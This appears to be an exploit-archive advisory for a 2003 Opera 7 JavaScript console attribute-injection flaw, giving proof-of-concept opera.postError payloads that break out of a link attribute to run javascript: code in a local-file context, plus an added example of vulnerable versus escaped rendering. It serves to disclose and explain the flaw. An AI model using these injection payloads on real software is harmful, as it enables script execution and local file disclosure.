Opera 7.0 - JavaScript Console Attribute Injection

Author: GreyMagic Software
type: remote
platform: windows
date_added: 2003-02-04  
date_updated: 2012-10-24  
verified: 1  

raw file: 22213.txt  
source: https://www.securityfocus.com/bid/6755/info

A vulnerability has been reported in Opera 7 for Microsoft Windows. The flaw is in the Opera JavaScript console. Attackers may exploit it to execute script code in a sensitive context, which may lead to disclosure of local file contents.

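// Open console.html from file://localhost in a new window.
open("file://localhost/console.html","","");
// Post an error message whose URL contains a double quote followed by a style attribute.
opera.postError("http://\"style=\"background-image:url('javascript:alert(location.href)')\"");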

// Variant: the same message with a file:// URL prefix.
open("file://localhost/console.html","","");
opera.postError("file://\"style=\"background-image:url('javascript:alert(location.href)')\".");
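
The attribute-injection pattern the strings above rely on, shown from the rendering side as an added example (not part of the original advisory and not Opera's code). `renderLinkUnsafe`, `renderLinkSafe`, `escapeAttr`, `attributeNames` and the `<a>` markup are assumptions: a hypothetical console that turns URLs in error messages into links, first without escaping and then with scheme allow-listing plus attribute escaping.

```javascript
// Added example: hypothetical model of a console that linkifies URLs found
// in error messages. Function names and markup are assumptions.

// Sample input: the first message string shown in the advisory.
const SAMPLE =
  "http://\"style=\"background-image:url('javascript:alert(location.href)')\"";

// Escape characters that can terminate or alter an HTML attribute value.
function escapeAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: the URL is concatenated into the attribute as-is, so a
// double quote in the message closes href and starts a new attribute.
function renderLinkUnsafe(url) {
  return '<a href="' + url + '">' + url + "</a>";
}

// Hardened pattern: allow-list the scheme, refuse strings containing
// characters that never appear unencoded in a URL, and escape regardless.
function renderLinkSafe(url) {
  const okScheme = /^https?:\/\//i.test(url);
  const okChars = !/["'<>\s]/.test(url);
  if (!okScheme || !okChars) {
    return "<span>" + escapeAttr(url) + "</span>"; // render as inert text
  }
  return '<a href="' + escapeAttr(url) + '">' + escapeAttr(url) + "</a>";
}

// List attribute names on the first tag, to show whether one was injected.
function attributeNames(html) {
  const tag = html.slice(0, html.indexOf(">"));
  return [...tag.matchAll(/[\s"]([a-zA-Z-]+)=/g)].map((m) => m[1]);
}

console.log(attributeNames(renderLinkUnsafe(SAMPLE))); // extra attribute present
console.log(attributeNames(renderLinkSafe(SAMPLE)));   // no attributes at all
```
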